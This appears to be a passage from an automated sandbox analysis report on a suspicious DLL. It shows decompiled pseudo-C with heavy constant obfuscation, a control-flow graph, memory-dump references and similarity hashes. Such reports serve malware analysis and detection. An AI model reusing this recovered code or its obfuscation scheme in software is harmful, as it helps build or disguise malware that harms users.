                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v28 = 0xcd60b7;
                                                                                                                                                                            				_v12 = 0x7257ab;
                                                                                                                                                                            				_v12 = _v12 << 0xd;
                                                                                                                                                                            				_v12 = _v12 + 0x8f69;
                                                                                                                                                                            				_v12 = _v12 * 0x4c;
                                                                                                                                                                            				_v12 = _v12 ^ 0x410f7a13;
                                                                                                                                                                            				_v8 = 0x7b4696;
                                                                                                                                                                            				_v8 = _v8 + 0xffff4950;
                                                                                                                                                                            				_v8 = _v8 | 0x2a0f624b;
                                                                                                                                                                            				_v8 = _v8 * 0x3a;
                                                                                                                                                                            				_v8 = _v8 ^ 0xa0f3ec54;
                                                                                                                                                                            				_v20 = 0x8a2161;
                                                                                                                                                                            				_v20 = _v20 + 0xffff45ea;
                                                                                                                                                                            				_v20 = _v20 ^ 0x1b6c7fa6;
                                                                                                                                                                            				_v20 = _v20 ^ 0x1be8dede;
                                                                                                                                                                            				_v16 = 0xdcc12a;
                                                                                                                                                                            				_v16 = _v16 + 0xb9f4;
                                                                                                                                                                            				_v16 = _v16 + 0xffffcfef;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00d9de04;
                                                                                                                                                                            				E02F5EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
                                                                                                                                                                            				_t53 = lstrcmpiW(_a4, _t56); // executed
                                                                                                                                                                            				return _t53;
                                                                                                                                                                            			}












                                                                                                                                                                            0x02f70624
                                                                                                                                                                            0x02f70627
                                                                                                                                                                            0x02f70629
                                                                                                                                                                            0x02f7062c
                                                                                                                                                                            0x02f7062f
                                                                                                                                                                            0x02f70630
                                                                                                                                                                            0x02f70631
                                                                                                                                                                            0x02f70636
                                                                                                                                                                            0x02f7063d
                                                                                                                                                                            0x02f70644
                                                                                                                                                                            0x02f7064b
                                                                                                                                                                            0x02f7064f
                                                                                                                                                                            0x02f70667
                                                                                                                                                                            0x02f7066a
                                                                                                                                                                            0x02f70671
                                                                                                                                                                            0x02f70678
                                                                                                                                                                            0x02f7067f
                                                                                                                                                                            0x02f7068b
                                                                                                                                                                            0x02f7068e
                                                                                                                                                                            0x02f70695
                                                                                                                                                                            0x02f7069c
                                                                                                                                                                            0x02f706a3
                                                                                                                                                                            0x02f706aa
                                                                                                                                                                            0x02f706b1
                                                                                                                                                                            0x02f706b8
                                                                                                                                                                            0x02f706bf
                                                                                                                                                                            0x02f706c6
                                                                                                                                                                            0x02f706d9
                                                                                                                                                                            0x02f706e5
                                                                                                                                                                            0x02f706eb

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02F706E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                                            • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                                                                                            • Instruction ID: 6f60f50be75ce583f3f16412e15eac3946fdef5fb8a94d763df8515cc4cbf892
                                                                                                                                                                            • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                                                                                            • Instruction Fuzzy Hash: B921E3B1C01319BBCF14DFA9D9499DEBFB5FB20354F108298E529A6251D3B59B04CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 51 2f58636-2f59aca 52 2f59ad5-2f59adb 51->52 53 2f59f21-2f59f27 52->53 54 2f59ae1 52->54 57 2f5a137-2f5a13d 53->57 58 2f59f2d 53->58 55 2f5a3e5-2f5a3f8 call 2f627f9 54->55 56 2f59ae7-2f59aed 54->56 87 2f5a406-2f5a40d 55->87 62 2f59af3 56->62 63 2f59d2c-2f59d32 56->63 59 2f5a284-2f5a28a 57->59 60 2f5a143 57->60 64 2f59f33-2f59f39 58->64 65 2f5a11d-2f5a132 call 2f5f8a0 58->65 74 2f5a290-2f5a296 59->74 75 2f5a3a8-2f5a3b4 call 2f5a445 59->75 69 2f5a149-2f5a14f 60->69 70 2f5a27a-2f5a27f 60->70 72 2f59d07-2f59d1c call 2f70e63 62->72 73 2f59af9-2f59aff 62->73 67 2f59e70-2f59e76 63->67 68 2f59d38 63->68 76 2f59fd2-2f59fd8 64->76 77 2f59f3f 64->77 65->52 88 2f59e7c-2f59e82 67->88 89 2f59f0b-2f59f1c call 2f72009 67->89 81 2f59e53-2f59e65 call 2f63eaa 68->81 82 2f59d3e-2f59d44 68->82 85 2f5a1c4-2f5a1ec call 2f6e4e5 69->85 86 2f5a151-2f5a153 69->86 70->52 72->87 120 2f59d22-2f59d27 72->120 90 2f59b05 73->90 91 2f59c82-2f59c88 73->91 93 2f5a29c-2f5a2a2 74->93 94 2f5a38b-2f5a3a3 call 2f68d3d 74->94 96 2f5a3b9-2f5a3bf 75->96 83 2f59fde-2f59fe4 76->83 84 2f5a0fb-2f5a10d call 2f6ad08 76->84 78 2f59f41-2f59f47 77->78 79 2f59fbf-2f59fcd call 2f6fbde 77->79 113 2f59f4d-2f59f53 78->113 114 2f5a3fa-2f5a401 call 2f5a417 78->114 79->52 81->67 99 2f59e2e-2f59e43 call 2f5bdf9 82->99 100 2f59d4a-2f59d50 82->100 101 2f5a0dd-2f5a0eb call 2f64a66 83->101 102 2f59fea-2f59ff0 83->102 84->87 176 2f5a113-2f5a118 84->176 157 2f5a1f4-2f5a1fd 85->157 158 2f5a1ee-2f5a1f2 85->158 103 2f5a155-2f5a15b 86->103 104 2f5a1a2-2f5a1bf call 2f55386 86->104 117 2f59e84-2f59e8a 88->117 118 2f59ef8-2f59f06 call 2f54b5d 88->118 89->52 107 2f59c42-2f59c7d call 2f577a3 90->107 108 2f59b0b-2f59b11 90->108 110 2f5a3c7-2f5a3e3 call 2f717bd 91->110 111 2f59c8e-2f59c94 91->111 93->96 97 2f5a2a8-2f5a389 call 2f63d85 * 2 call 2f69a01 call 2f6fecb * 2 93->97 94->52 96->52 139 2f5a3c5 96->139 97->96 99->87 198 2f59e49-2f59e4e 99->198 123 2f59d52-2f59d58 100->123 124 2f59dcf-2f59e29 call 2f5a40e call 2f6d1bc 100->124 101->87 199 2f5a0f1-2f5a0f6 101->199 125 2f59ff2-2f59ff8 102->125 126 2f5a048-2f5a077 call 2f555ff 102->126 127 2f5a15d-2f5a163 103->127 128 2f5a17e-2f5a19d call 2f6c387 103->128 104->52 107->52 134 2f59b17-2f59b1d 108->134 135 2f59be8-2f59bfd call 2f5670b 108->135 110->87 137 2f59c96-2f59c9c 111->137 138 2f59cf1-2f59d02 call 2f72699 111->138 140 2f59f55-2f59f5b 113->140 141 2f59fa9-2f59fba call 2f6c5d5 113->141 114->87 148 2f59ec2-2f59ef3 call 2f6e955 call 2f6d111 117->148 149 2f59e8c-2f59e92 117->149 118->52 120->52 166 2f59db7-2f59dca 123->166 167 2f59d5a-2f59d60 123->167 124->52 125->96 168 2f59ffe-2f5a043 call 2f70e63 call 2f6cca0 125->168 215 2f5a0b0-2f5a0ba 126->215 216 2f5a079-2f5a0ab call 2f6cca0 126->216 127->96 152 2f5a169-2f5a179 127->152 128->52 171 2f59bc3-2f59bd8 call 2f62142 134->171 172 2f59b23-2f59b29 134->172 204 2f59c22-2f59c3d call 2f6d111 135->204 205 2f59bff-2f59c1d call 2f6d111 135->205 159 2f59cd4-2f59cec call 2f530e7 137->159 160 2f59c9e-2f59ca4 137->160 138->52 139->87 161 2f59f5d-2f59f63 140->161 162 2f59f8f-2f59fa4 call 2f5d14c 140->162 141->52 148->52 149->96 177 2f59e98-2f59ebd call 2f5de74 149->177 152->52 184 2f5a236-2f5a239 157->184 185 2f5a1ff-2f5a22f call 2f6cca0 157->185 182 2f5a26e-2f5a275 158->182 159->52 160->96 183 2f59caa-2f59cc9 call 2f72b09 160->183 161->96 186 2f59f69-2f59f77 call 2f6d111 161->186 162->52 166->52 167->96 192 2f59d66-2f59db2 call 2f6c37e call 2f6bd13 167->192 240 2f59cca-2f59ccf 168->240 171->87 221 2f59bde-2f59be3 171->221 196 2f59b61-2f59b68 172->196 197 2f59b2b-2f59b31 172->197 176->52 177->52 182->52 183->240 184->182 209 2f5a23b-2f5a26c call 2f6cca0 184->209 185->184 241 2f59f85-2f59f8a 186->241 242 2f59f79-2f59f80 call 2f5c6b8 186->242 192->52 219 2f59bbc-2f59bbe 196->219 220 2f59b6a-2f59ba4 call 2f5a40e call 2f71028 196->220 197->96 218 2f59b37-2f59b5c call 2f72b09 197->218 198->52 199->52 204->52 205->52 209->182 234 2f5a0c6-2f5a0c8 215->234 235 2f5a0bc-2f5a0c1 215->235 216->241 218->52 219->96 259 2f59ba6-2f59bab 220->259 260 2f59bb0-2f59bb7 call 2f64f74 220->260 221->52 249 2f5a0d3-2f5a0d8 234->249 250 2f5a0ca-2f5a0cd 234->250 235->52 240->52 241->52 242->241 249->52 250->241 250->249 259->52 260->219
                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E02F58636() {
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				char _v56;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				char _v100;
                                                                                                                                                                            				char _v108;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				char _v152;
                                                                                                                                                                            				char _v160;
                                                                                                                                                                            				char _v164;
                                                                                                                                                                            				char _v168;
                                                                                                                                                                            				char _v172;
                                                                                                                                                                            				char _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				unsigned int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				signed int _v200;
                                                                                                                                                                            				signed int _v204;
                                                                                                                                                                            				signed int _v208;
                                                                                                                                                                            				signed int _v212;
                                                                                                                                                                            				unsigned int _v216;
                                                                                                                                                                            				signed int _v220;
                                                                                                                                                                            				signed int _v224;
                                                                                                                                                                            				signed int _v228;
                                                                                                                                                                            				signed int _v232;
                                                                                                                                                                            				signed int _v236;
                                                                                                                                                                            				signed int _v240;
                                                                                                                                                                            				signed int _v244;
                                                                                                                                                                            				signed int _v248;
                                                                                                                                                                            				signed int _v252;
                                                                                                                                                                            				signed int _v256;
                                                                                                                                                                            				signed int _v260;
                                                                                                                                                                            				signed int _v264;
                                                                                                                                                                            				unsigned int _v268;
                                                                                                                                                                            				unsigned int _v272;
                                                                                                                                                                            				signed int _v276;
                                                                                                                                                                            				signed int _v280;
                                                                                                                                                                            				signed int _v284;
                                                                                                                                                                            				signed int _v288;
                                                                                                                                                                            				signed int _v292;
                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                            				signed int _v300;
                                                                                                                                                                            				signed int _v304;
                                                                                                                                                                            				signed int _v308;
                                                                                                                                                                            				signed int _v312;
                                                                                                                                                                            				signed int _v316;
                                                                                                                                                                            				signed int _v320;
                                                                                                                                                                            				signed int _v324;
                                                                                                                                                                            				signed int _v328;
                                                                                                                                                                            				signed int _v332;
                                                                                                                                                                            				unsigned int _v336;
                                                                                                                                                                            				signed int _v340;
                                                                                                                                                                            				signed int _v344;
                                                                                                                                                                            				signed int _v348;
                                                                                                                                                                            				signed int _v352;
                                                                                                                                                                            				signed int _v356;
                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                            				signed int _v364;
                                                                                                                                                                            				signed int _v368;
                                                                                                                                                                            				signed int _v372;
                                                                                                                                                                            				signed int _v376;
                                                                                                                                                                            				signed int _v380;
                                                                                                                                                                            				signed int _v384;
                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                            				signed int _v392;
                                                                                                                                                                            				signed int _v396;
                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                            				signed int _v408;
                                                                                                                                                                            				signed int _v412;
                                                                                                                                                                            				signed int _v416;
                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                            				signed int _v428;
                                                                                                                                                                            				signed int _v432;
                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                            				signed int _v440;
                                                                                                                                                                            				signed int _v444;
                                                                                                                                                                            				unsigned int _v448;
                                                                                                                                                                            				signed int _v452;
                                                                                                                                                                            				signed int _v456;
                                                                                                                                                                            				signed int _v460;
                                                                                                                                                                            				signed int _v464;
                                                                                                                                                                            				signed int _v468;
                                                                                                                                                                            				signed int _v472;
                                                                                                                                                                            				signed int _v476;
                                                                                                                                                                            				signed int _v480;
                                                                                                                                                                            				signed int _v484;
                                                                                                                                                                            				unsigned int _v488;
                                                                                                                                                                            				signed int _v492;
                                                                                                                                                                            				signed int _v496;
                                                                                                                                                                            				signed int _v500;
                                                                                                                                                                            				signed int _v504;
                                                                                                                                                                            				signed int _v508;
                                                                                                                                                                            				signed int _v512;
                                                                                                                                                                            				signed int _v516;
                                                                                                                                                                            				signed int _v520;
                                                                                                                                                                            				signed int _v524;
                                                                                                                                                                            				unsigned int _v528;
                                                                                                                                                                            				signed int _v532;
                                                                                                                                                                            				signed int _v536;
                                                                                                                                                                            				signed int _v540;
                                                                                                                                                                            				signed int _v544;
                                                                                                                                                                            				signed int _v548;
                                                                                                                                                                            				signed int _v552;
                                                                                                                                                                            				unsigned int _v556;
                                                                                                                                                                            				signed int _v560;
                                                                                                                                                                            				signed int _v564;
                                                                                                                                                                            				signed int _v568;
                                                                                                                                                                            				signed int _v572;
                                                                                                                                                                            				signed int _v576;
                                                                                                                                                                            				signed int _v580;
                                                                                                                                                                            				signed int _v584;
                                                                                                                                                                            				unsigned int _v588;
                                                                                                                                                                            				signed int _v592;
                                                                                                                                                                            				signed int _v596;
                                                                                                                                                                            				signed int _v600;
                                                                                                                                                                            				signed int _v604;
                                                                                                                                                                            				signed int _v608;
                                                                                                                                                                            				signed int _v612;
                                                                                                                                                                            				signed int _v616;
                                                                                                                                                                            				unsigned int _v620;
                                                                                                                                                                            				signed int _v624;
                                                                                                                                                                            				signed int _v628;
                                                                                                                                                                            				signed int _v632;
                                                                                                                                                                            				signed int _v636;
                                                                                                                                                                            				signed int _v640;
                                                                                                                                                                            				signed int _v644;
                                                                                                                                                                            				signed int _v648;
                                                                                                                                                                            				signed int _v652;
                                                                                                                                                                            				signed int _v656;
                                                                                                                                                                            				signed int _v660;
                                                                                                                                                                            				signed int _v664;
                                                                                                                                                                            				signed int _v668;
                                                                                                                                                                            				signed int _v672;
                                                                                                                                                                            				unsigned int _v676;
                                                                                                                                                                            				signed int _t1259;
                                                                                                                                                                            				signed int _t1287;
                                                                                                                                                                            				signed int _t1299;
                                                                                                                                                                            				signed int _t1310;
                                                                                                                                                                            				signed int _t1340;
                                                                                                                                                                            				signed int _t1341;
                                                                                                                                                                            				signed int _t1343;
                                                                                                                                                                            				signed int _t1344;
                                                                                                                                                                            				signed int _t1345;
                                                                                                                                                                            				signed int _t1346;
                                                                                                                                                                            				signed int _t1347;
                                                                                                                                                                            				signed int _t1348;
                                                                                                                                                                            				signed int _t1349;
                                                                                                                                                                            				signed int _t1350;
                                                                                                                                                                            				signed int _t1351;
                                                                                                                                                                            				signed int _t1352;
                                                                                                                                                                            				signed int _t1353;
                                                                                                                                                                            				signed int _t1354;
                                                                                                                                                                            				signed int _t1355;
                                                                                                                                                                            				signed int _t1356;
                                                                                                                                                                            				signed int _t1357;
                                                                                                                                                                            				signed int _t1358;
                                                                                                                                                                            				signed int _t1359;
                                                                                                                                                                            				signed int _t1360;
                                                                                                                                                                            				signed int _t1361;
                                                                                                                                                                            				signed int _t1362;
                                                                                                                                                                            				signed int _t1363;
                                                                                                                                                                            				signed int _t1364;
                                                                                                                                                                            				signed int _t1365;
                                                                                                                                                                            				signed int _t1384;
                                                                                                                                                                            				signed int _t1465;
                                                                                                                                                                            				signed int _t1466;
                                                                                                                                                                            				signed int _t1469;
                                                                                                                                                                            				signed int _t1482;
                                                                                                                                                                            				signed int _t1495;
                                                                                                                                                                            				signed int _t1498;
                                                                                                                                                                            				void* _t1500;
                                                                                                                                                                            				void* _t1504;
                                                                                                                                                                            				void* _t1505;
                                                                                                                                                                            				void* _t1506;
                                                                                                                                                                            
                                                                                                                                                                            				_t1500 = (_t1498 & 0xfffffff8) - 0x2a0;
                                                                                                                                                                            				_v548 = 0x612d76;
                                                                                                                                                                            				_v548 = _v548 + 0xffffb226;
                                                                                                                                                                            				_v548 = _v548 ^ 0x25733830;
                                                                                                                                                                            				_v548 = _v548 + 0x94f7;
                                                                                                                                                                            				_v548 = _v548 ^ 0x25147da1;
                                                                                                                                                                            				_v608 = 0x8e6410;
                                                                                                                                                                            				_v608 = _v608 | 0x5e5673b6;
                                                                                                                                                                            				_v608 = _v608 ^ 0x9913f1ef;
                                                                                                                                                                            				_v608 = _v608 * 0x3a;
                                                                                                                                                                            				_t1469 = 0xe6d4a04;
                                                                                                                                                                            				_v608 = _v608 ^ 0x4490702a;
                                                                                                                                                                            				_v332 = 0x40e6a4;
                                                                                                                                                                            				_v332 = _v332 ^ 0x1ba14b53;
                                                                                                                                                                            				_v332 = _v332 ^ 0x1be1adf7;
                                                                                                                                                                            				_v388 = 0xd7ca30;
                                                                                                                                                                            				_t1343 = 0x42;
                                                                                                                                                                            				_v388 = _v388 / _t1343;
                                                                                                                                                                            				_v388 = _v388 + 0x3798;
                                                                                                                                                                            				_v388 = _v388 ^ 0x000f1b75;
                                                                                                                                                                            				_v216 = 0xd7fc5;
                                                                                                                                                                            				_v216 = _v216 >> 1;
                                                                                                                                                                            				_v216 = _v216 ^ 0x0004b337;
                                                                                                                                                                            				_v516 = 0x59f14d;
                                                                                                                                                                            				_v516 = _v516 >> 0xf;
                                                                                                                                                                            				_t1344 = 0x4a;
                                                                                                                                                                            				_v516 = _v516 / _t1344;
                                                                                                                                                                            				_v516 = _v516 << 0xb;
                                                                                                                                                                            				_v516 = _v516 ^ 0x00046054;
                                                                                                                                                                            				_v304 = 0xedc603;
                                                                                                                                                                            				_v304 = _v304 + 0xffffc02b;
                                                                                                                                                                            				_v304 = _v304 ^ 0x00efeb53;
                                                                                                                                                                            				_v232 = 0x637592;
                                                                                                                                                                            				_t1465 = 0x6f;
                                                                                                                                                                            				_t1345 = 0x31;
                                                                                                                                                                            				_v232 = _v232 * 0x71;
                                                                                                                                                                            				_v232 = _v232 ^ 0x2bef3074;
                                                                                                                                                                            				_v372 = 0x919268;
                                                                                                                                                                            				_v372 = _v372 << 9;
                                                                                                                                                                            				_v372 = _v372 + 0x904f;
                                                                                                                                                                            				_v372 = _v372 ^ 0x2324b0cf;
                                                                                                                                                                            				_v484 = 0x568eb3;
                                                                                                                                                                            				_v484 = _v484 * 0x42;
                                                                                                                                                                            				_v484 = _v484 / _t1465;
                                                                                                                                                                            				_v484 = _v484 ^ 0x0034ded9;
                                                                                                                                                                            				_v472 = 0x365886;
                                                                                                                                                                            				_v472 = _v472 << 0xc;
                                                                                                                                                                            				_v472 = _v472 + 0xffff5d21;
                                                                                                                                                                            				_v472 = _v472 ^ 0x6583ba5b;
                                                                                                                                                                            				_v436 = 0xdfd34b;
                                                                                                                                                                            				_v436 = _v436 / _t1345;
                                                                                                                                                                            				_v436 = _v436 | 0x191717ac;
                                                                                                                                                                            				_v436 = _v436 ^ 0x1914e100;
                                                                                                                                                                            				_v196 = 0xd88df0;
                                                                                                                                                                            				_t1346 = 0x15;
                                                                                                                                                                            				_v196 = _v196 / _t1346;
                                                                                                                                                                            				_v196 = _v196 ^ 0x0009e710;
                                                                                                                                                                            				_v356 = 0xb64ed2;
                                                                                                                                                                            				_v356 = _v356 >> 0xd;
                                                                                                                                                                            				_t1340 = 0x1c;
                                                                                                                                                                            				_t1347 = 0x51;
                                                                                                                                                                            				_v356 = _v356 * 0x63;
                                                                                                                                                                            				_v356 = _v356 ^ 0x0006dcaa;
                                                                                                                                                                            				_v336 = 0x65c0e5;
                                                                                                                                                                            				_v336 = _v336 * 0x7a;
                                                                                                                                                                            				_v336 = _v336 >> 3;
                                                                                                                                                                            				_v336 = _v336 ^ 0x060f054d;
                                                                                                                                                                            				_v492 = 0x31a1;
                                                                                                                                                                            				_v492 = _v492 ^ 0x5b528d22;
                                                                                                                                                                            				_v492 = _v492 << 5;
                                                                                                                                                                            				_v492 = _v492 ^ 0x6a59b43c;
                                                                                                                                                                            				_v652 = 0x40a60;
                                                                                                                                                                            				_v652 = _v652 | 0x6178721b;
                                                                                                                                                                            				_v652 = _v652 + 0x8e9b;
                                                                                                                                                                            				_v652 = _v652 / _t1340;
                                                                                                                                                                            				_v652 = _v652 ^ 0x037a42dd;
                                                                                                                                                                            				_v272 = 0xf0169f;
                                                                                                                                                                            				_v272 = _v272 >> 5;
                                                                                                                                                                            				_v272 = _v272 ^ 0x0004695a;
                                                                                                                                                                            				_v528 = 0x24fae7;
                                                                                                                                                                            				_v528 = _v528 ^ 0xfec3499d;
                                                                                                                                                                            				_v528 = _v528 << 0xf;
                                                                                                                                                                            				_v528 = _v528 >> 0xc;
                                                                                                                                                                            				_v528 = _v528 ^ 0x0001af4c;
                                                                                                                                                                            				_v188 = 0x9b8757;
                                                                                                                                                                            				_v188 = _v188 >> 4;
                                                                                                                                                                            				_v188 = _v188 ^ 0x000b2d6a;
                                                                                                                                                                            				_v256 = 0x948fd;
                                                                                                                                                                            				_v256 = _v256 ^ 0xf30bafdb;
                                                                                                                                                                            				_v256 = _v256 ^ 0xf30b6e1f;
                                                                                                                                                                            				_v464 = 0x93fe09;
                                                                                                                                                                            				_v464 = _v464 / _t1347;
                                                                                                                                                                            				_t1348 = 0x23;
                                                                                                                                                                            				_v464 = _v464 * 0x7a;
                                                                                                                                                                            				_v464 = _v464 ^ 0x00d327e8;
                                                                                                                                                                            				_v648 = 0xd540cd;
                                                                                                                                                                            				_v648 = _v648 * 0x5c;
                                                                                                                                                                            				_v648 = _v648 >> 0xb;
                                                                                                                                                                            				_v648 = _v648 / _t1348;
                                                                                                                                                                            				_v648 = _v648 ^ 0x0005d45a;
                                                                                                                                                                            				_v540 = 0x2acc1;
                                                                                                                                                                            				_v540 = _v540 >> 7;
                                                                                                                                                                            				_v540 = _v540 << 0x10;
                                                                                                                                                                            				_t1349 = 0x59;
                                                                                                                                                                            				_v540 = _v540 / _t1349;
                                                                                                                                                                            				_v540 = _v540 ^ 0x000fef6f;
                                                                                                                                                                            				_v264 = 0xfe7d93;
                                                                                                                                                                            				_v264 = _v264 ^ 0x4bd787a7;
                                                                                                                                                                            				_v264 = _v264 ^ 0x4b22b45d;
                                                                                                                                                                            				_v208 = 0x23d5c9;
                                                                                                                                                                            				_v208 = _v208 ^ 0x8f5a829d;
                                                                                                                                                                            				_v208 = _v208 ^ 0x8f7555ae;
                                                                                                                                                                            				_v524 = 0x2aaed2;
                                                                                                                                                                            				_v524 = _v524 | 0x9661325e;
                                                                                                                                                                            				_t1495 = 0x5c;
                                                                                                                                                                            				_v524 = _v524 / _t1495;
                                                                                                                                                                            				_v524 = _v524 * 0x63;
                                                                                                                                                                            				_v524 = _v524 ^ 0xa1d330ca;
                                                                                                                                                                            				_v612 = 0x173148;
                                                                                                                                                                            				_v612 = _v612 >> 5;
                                                                                                                                                                            				_v612 = _v612 + 0x14e7;
                                                                                                                                                                            				_v612 = _v612 / _t1349;
                                                                                                                                                                            				_v612 = _v612 ^ 0x0000773b;
                                                                                                                                                                            				_v620 = 0xe48585;
                                                                                                                                                                            				_v620 = _v620 << 0x10;
                                                                                                                                                                            				_v620 = _v620 * 0x32;
                                                                                                                                                                            				_v620 = _v620 >> 7;
                                                                                                                                                                            				_v620 = _v620 ^ 0x0028030c;
                                                                                                                                                                            				_v500 = 0xfd3bdc;
                                                                                                                                                                            				_v500 = _v500 << 0xa;
                                                                                                                                                                            				_v500 = _v500 ^ 0xf4e13163;
                                                                                                                                                                            				_v520 = 0xe4fc5f;
                                                                                                                                                                            				_v520 = _v520 + 0xa13e;
                                                                                                                                                                            				_v520 = _v520 + 0xffff7828;
                                                                                                                                                                            				_v520 = _v520 ^ 0x4d340404;
                                                                                                                                                                            				_v520 = _v520 ^ 0x4dd63175;
                                                                                                                                                                            				_v360 = 0x9532ce;
                                                                                                                                                                            				_v360 = _v360 ^ 0xdad74cca;
                                                                                                                                                                            				_v360 = _v360 | 0x8468d9e2;
                                                                                                                                                                            				_v360 = _v360 ^ 0xde69f572;
                                                                                                                                                                            				_v604 = 0x3a7c91;
                                                                                                                                                                            				_v604 = _v604 | 0x10f1a45d;
                                                                                                                                                                            				_v604 = _v604 + 0xffff6d1e;
                                                                                                                                                                            				_v604 = _v604 | 0x776d764a;
                                                                                                                                                                            				_v604 = _v604 ^ 0x77f7c5e5;
                                                                                                                                                                            				_v212 = 0x6e3f57;
                                                                                                                                                                            				_t279 =  &_v212; // 0x6e3f57
                                                                                                                                                                            				_v212 =  *_t279 * 3;
                                                                                                                                                                            				_v212 = _v212 ^ 0x01468193;
                                                                                                                                                                            				_v220 = 0x58f789;
                                                                                                                                                                            				_v220 = _v220 << 5;
                                                                                                                                                                            				_v220 = _v220 ^ 0x0b1ef21b;
                                                                                                                                                                            				_v236 = 0x737654;
                                                                                                                                                                            				_v236 = _v236 + 0xe2b4;
                                                                                                                                                                            				_v236 = _v236 ^ 0x0073a4da;
                                                                                                                                                                            				_v416 = 0xc8c3a8;
                                                                                                                                                                            				_v416 = _v416 ^ 0x4478b906;
                                                                                                                                                                            				_v416 = _v416 * 0xc;
                                                                                                                                                                            				_v416 = _v416 ^ 0x384ff3ff;
                                                                                                                                                                            				_v576 = 0x407f47;
                                                                                                                                                                            				_v576 = _v576 + 0x1a0d;
                                                                                                                                                                            				_v576 = _v576 * 0x63;
                                                                                                                                                                            				_v576 = _v576 << 2;
                                                                                                                                                                            				_v576 = _v576 ^ 0x63e80fef;
                                                                                                                                                                            				_v228 = 0x9b4b6;
                                                                                                                                                                            				_v228 = _v228 + 0xffffd2d4;
                                                                                                                                                                            				_v228 = _v228 ^ 0x000d2243;
                                                                                                                                                                            				_v552 = 0xb96e33;
                                                                                                                                                                            				_v552 = _v552 + 0x4381;
                                                                                                                                                                            				_v552 = _v552 * 0xf;
                                                                                                                                                                            				_v552 = _v552 + 0xffffbee9;
                                                                                                                                                                            				_v552 = _v552 ^ 0x0ae545e5;
                                                                                                                                                                            				_v560 = 0xe19e88;
                                                                                                                                                                            				_v560 = _v560 | 0xc222c343;
                                                                                                                                                                            				_v560 = _v560 / _t1465;
                                                                                                                                                                            				_v560 = _v560 + 0x567c;
                                                                                                                                                                            				_v560 = _v560 ^ 0x01c941bb;
                                                                                                                                                                            				_v568 = 0xf463df;
                                                                                                                                                                            				_v568 = _v568 | 0x401122c6;
                                                                                                                                                                            				_v568 = _v568 >> 3;
                                                                                                                                                                            				_v568 = _v568 | 0xf3373c61;
                                                                                                                                                                            				_v568 = _v568 ^ 0xfb38c632;
                                                                                                                                                                            				_v392 = 0xa88994;
                                                                                                                                                                            				_v392 = _v392 >> 2;
                                                                                                                                                                            				_v392 = _v392 + 0xfffffc92;
                                                                                                                                                                            				_v392 = _v392 ^ 0x002883f3;
                                                                                                                                                                            				_v544 = 0x16009;
                                                                                                                                                                            				_v544 = _v544 ^ 0x700f0ae7;
                                                                                                                                                                            				_v544 = _v544 << 0xd;
                                                                                                                                                                            				_v544 = _v544 + 0xffffa581;
                                                                                                                                                                            				_v544 = _v544 ^ 0xcd57c12d;
                                                                                                                                                                            				_v400 = 0x4e3251;
                                                                                                                                                                            				_v400 = _v400 << 0xd;
                                                                                                                                                                            				_v400 = _v400 << 0xb;
                                                                                                                                                                            				_v400 = _v400 ^ 0x510ef6f0;
                                                                                                                                                                            				_v408 = 0xce49b4;
                                                                                                                                                                            				_v408 = _v408 / _t1340;
                                                                                                                                                                            				_v408 = _v408 | 0xa9ee0ad6;
                                                                                                                                                                            				_v408 = _v408 ^ 0xa9ed29cd;
                                                                                                                                                                            				_v368 = 0xfab4ff;
                                                                                                                                                                            				_v368 = _v368 ^ 0x8bb4f731;
                                                                                                                                                                            				_v368 = _v368 + 0x4788;
                                                                                                                                                                            				_v368 = _v368 ^ 0x8b4dbddc;
                                                                                                                                                                            				_v376 = 0x3b857d;
                                                                                                                                                                            				_v376 = _v376 + 0xd8be;
                                                                                                                                                                            				_v376 = _v376 ^ 0x0c7e0de1;
                                                                                                                                                                            				_v376 = _v376 ^ 0x0c4b703c;
                                                                                                                                                                            				_v384 = 0x702b67;
                                                                                                                                                                            				_v384 = _v384 + 0x7016;
                                                                                                                                                                            				_v384 = _v384 | 0xc6195e9d;
                                                                                                                                                                            				_v384 = _v384 ^ 0xc67058d5;
                                                                                                                                                                            				_v536 = 0xd092b2;
